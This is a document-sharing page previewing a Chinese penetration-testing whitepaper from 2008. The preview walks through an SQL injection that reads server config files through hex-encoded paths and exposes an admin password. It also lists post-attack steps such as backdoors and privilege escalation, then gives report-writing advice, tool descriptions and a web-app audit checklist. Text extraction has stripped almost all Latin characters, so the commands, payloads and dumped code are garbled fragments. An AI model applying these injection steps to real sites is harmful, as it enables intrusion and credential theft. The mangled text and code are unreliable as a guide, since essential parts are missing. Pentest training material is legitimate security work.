安全渗透测试技术白皮书_第1页
安全渗透测试技术白皮书_第2页
安全渗透测试技术白皮书_第3页
安全渗透测试技术白皮书_第4页
安全渗透测试技术白皮书_第5页
已阅读5页,还剩23页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

/安全渗透测试技术白皮书

2008年8月17日目录\o"1-3"\h\z\u'通过在正常后加上一个’号,我们发现系统报告了一个不是有效的命令的错误提示,这是典型的应用程序缺乏过滤导致的注入问题。资源占用导致应用程序报错采用(大成天下自行开发的应用层测试工具)发送测试数据包对网站的非80端口进行连接,占用系统资源;采用(性能测试工具)程序对80端口应用程序及数据库进行连接及查询,占用资源;用浏览器多次连接后,出现错误提示,获取目录及配置文件详情::30C:\\\\\9:30C:\\\\\9由此得出路径及关键配置文件路径。列数9(0x41)(0x41)(0x41)(0x41)(0x41)(0x41)(0x41)(0x41)(0x41)可以确认需要带9个参数。尝试采用和函数察看文件c:\\\\\转换成16进制表示如下:0000000:633a5c696e65747075625c777777726f0000010:6f745c6368795c696e635c636f6e6669\\\0000020:672e696e632e7068700a.在函数中就表示为:((0x633a5c696e65747075625c777777726f6f因此在浏览器中输入:((0x633a5c696e65747075625c777777726f6f返回:($);$>($);$>($);$>($);$>();(!$>()),{"!";();}($."")?>在浏览器中输入:(((0x633a5c696e65747075625c777777726f6f返回:********/();(":,26199705:00:00");(":".("D,dMY")."");(":,");(":");$"2004";$"某某公司后台管理系统";$"略";$"";$"";$("","略);$(""("","1","2","3")("","4","5","6")("","1","2","3"));/***后台****/$('北京','上海','重庆','天津','河北','山西','内蒙古','辽宁','吉林','黑龙江','江苏','浙江','安徽','福建','江西','山东','河南','湖北','湖南','广东','广西','海南','四川','贵州','云南','西藏','陕西','甘肃','青海','宁夏','新疆');$("添加操作员","修改口令/权限","删除操作员","修改我的口令","公司新闻","行业信息","通知公告","企业大事记","人才招聘","服务网点","在线咨询","在线投诉","营销网点","车评管理","车型管理","企业荣誉","质量报道","友情链接");$("","","","","1","2","3","","","","","","","","","","4","");$("","","","","","1","2","3","4","5","6","7","8","9","10","11","12","13")不要出现重复的元素/****/$"";$"/"$$."";($."")$"";$$.$;$$.$;$$.$$$.$$$;$"";$"";$"";$"";$"123456";$"";$$>($);$>($);$>($);$>($);$>();(!$>()),{"!";();}($."")?>其中有许多有价值的信息,如的管理员密码、多个重要配置文件的位置等。通过返回值察看其它文件察看c:\\\\\:0000000:633a5c696e65747075625c777777726f0000010:6f745c6368795c696e635c646566696e\\\0000020:652e696e632e7068700a.((0x633a5c696e65747075625c777777726f6f((0x633a5c696e65747075625c777777726f6f$;}($){$>$;}($){$>$;}($){$>$;}($){$>$;}(){$>($>,$>,$>);(!($>)){;}{(($>)){;}{;}}}($){$($);($>){$>();}$;}($){(($)){($>){$>();};};}(){($>);($>){$>();}}(){($>);}($){$($);($>){$>();}$;}($){$($);($>){$>();}$;}($){$1($);($>){$>();}$1;}($,$){($,$);($>){$>();}}(){($>);}}($,$1){/****/$1="";$"点确定返回";($0){$1."((\"".$.",".$."\"));";"()\n";$2;}{$1."(\"".$."\");".$2;}}($,$=30){(($)>$){($0;$i<$;$){(($[$i])>128){$;}}$=($,0,$i)."...";}$;}($,$0){/******1**/$($);(($)>0){$("'","'",$);$('\\',"\",$);$('"',""",$);($1){$('<',"<",$);$('>',">",$);$($);}}$;}($4){$;($0;$i<$;$){$(0,9);$((97,122));}$[""]=$;$[""]();$;}(){$;(($."")){$($."");(($($))){(()($."".$)>10){($."".$);}}$(45,16);$=($,255,255,255);$=($,233,14,91);($,5,5,0,(),$);$()(0,100)."";($,$."".$);($);$."".$;}}(){$;$($."","r");$($($.""));($);($0);}(){$,$;($)=$>($>("(*)'$[]''$[]'"));($>0);}($){$,$,$;($.$);}($,$){"".$."\n";($){"\n";}}($){5($["5"].$);}($,$,$){$;$"察看c:\\\\:0000000:633a5c696e65747075625c777777726f0000010:6f745c6368795c61646d696e2e706870\\0000020:0a((0x633a5c696e65747075625c((0x633a5c696e65747075625c($);($>($)>0){$$>($);($[""]($[""])$[""]""){$$[""];$$[""];$$[""];($."");}{$"口令错误,请重新登录:";}}{$"帐号不存在,请重新登录:";}($);}{$"验证码不对或验证码过时!";}($){($."");}}{(())($."")($."");}($."")("")?>存在后台管理页面,且用户名有、结合看到的文件内容,得到结果:密码早就获取,但有密码保护,暂未考虑突破。其它还可以猜测数据库表名称、密码长度并猜测密码值等例如:返回'''t'''t()=12#后攻击阶段可能造成的影响攻击者如果成功完成这一步攻击后,还可以做的工作包括:上传,并尝试提升权限、破解口令、装载木马、口令嗅探等,甚至有可能渗透管理员或企业内部网络的机器等。附录:编写渗透测试报告一份有价值的渗透测试报告,能够帮助管理者迅速定位组织中的薄弱环节,用最少的代价规避可能遇到的风险。渗透测试报告重在精确、简洁。几个需要重点突出的部份都已经用粗体标注:渗透结论要简洁,清晰,便网络管理者或开发者能够迅速明白症结所在;预攻击阶段的操作是很多企业重点关注的,因为他们不仅希望知道哪些方法能够攻击自己,还希望知道渗透测试者尝试过哪些方法,面对哪类型的攻击,自己是安全的;攻击阶段的具体操作无疑是报告中的精彩部份;证据只需要简单列举,能够起到突出报告主题就够;解决方案需要细写。渗透测试部份使用工具说明网络拓扑分析工具采用的手段对指定网段内的主机进行存活情况判定,并收集相应的主机名,名。采用正向、反向查询的手段对指定网段内的主机进行,并收集相应的主机名,名。采用区域传输取得目标域配置,对目标拓扑进行辅助分析。采用对及目标之间路由情况进行分析,判断目标网络链路,防火墙状况。安全漏洞扫描工具脆弱性扫描评估系统脆弱性扫描评估系统是一套基于平台的漏洞扫描软件,它包括了网络模拟攻击、漏洞检测、报告服务进程、提取对象信息、风险评估和安全建议等功能,帮助用户控制可能发生的安全事件,最大可能地消除安全隐患。脆弱性扫描评估系统中内置了针对主机(包括、、、、、等)、网络设备(包括常见如、3、、等品牌设备)、数据库(包括、、、2等使用广泛的关系数据库)的审核策略。并且兼容、等漏洞标准,具有强大的漏洞检测能力和检测效率、贴切用户需求的功能定义、灵活多样的检测方式、详尽的漏洞修补方案和友好的报表系统,并支持在线升级。网络安全评估软件是一个网络安全评估软件,功能强大且更新极快。该系统被设计为客户机/服务器模式,服务器端负责进行安全检查,客户端用来配置管理服务器端。的服务端采用了的体系,为了方便用户编写自己的检测插件,还提供了一种叫做攻击脚本语言()的脚本语言。检查的结果可以使用、纯文本、、等格式保存。和2功能强大的端口扫描软件,支持多种协议的扫描如,()(),(),(),,,,和扫描。还提供一些实用功能如通过来甄别操作系统类型、秘密扫描、动态延迟和重发、平行扫描、通过并行的侦测下属的主机、欺骗扫描、端口过滤探测、直接的扫描、分布扫描、灵活的目标选择以及端口的描述。2是一款利用协议识别操作系统的软件。是设计开发的一款自动进行渗透测试的工具框架。其它及数据库检测工具包括部份公开及私有的和数据库检测工具。漏洞利用工具中科正阳漏洞挖掘实验室收集、交换及自行研究开发的各种操作系统及应用攻击代码。对及的基本检测项目示例及除了可能出现应用程序编写方面的错误外,服务器本身在历史上也出现过多种安全漏洞,在我们的基本检测项目中,对的检测项目包括:对的检测项目包括:对及其它或应用进行分析检查应用系统架构、防止用户绕过系统直接修改数据库-检查系统是否采用3层架构?-检查用户是否可以直接登录数据库?-检查数据库是否对中间件进行验证和限制?检查身份认证模块,防止非法用户绕过身份认证-测试登录验证页面,检查身份认证方式?-检查验证是客户端验证还是服务器端验证?-测试登录后页面,检查是否所有页面都需要身份验证?-检查客户端和,是否存放敏感信息?-检查系统是否可以被暴利破解,是否有多次登录失败锁定机制?-检查服务器,查看是否有错误登录日志?-检查应用程序是否有多级权限,不同权限的判别是在服务器端还是客户端?权限标志是在还是中,检查是否可以绕过权限设置?-检查系统是否可以被?-检查系统是否可以被重放攻击?-检查系统是否可以被伪造攻击?-检查系统是否可以通过“取回密码功能”攻击?检查数据库接口模块,防止用户获取系统权限-查看所有的输入页面,检查输入是否经过验证?-检查是否可以被语句注入,登陆系统?-检查是否可以

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论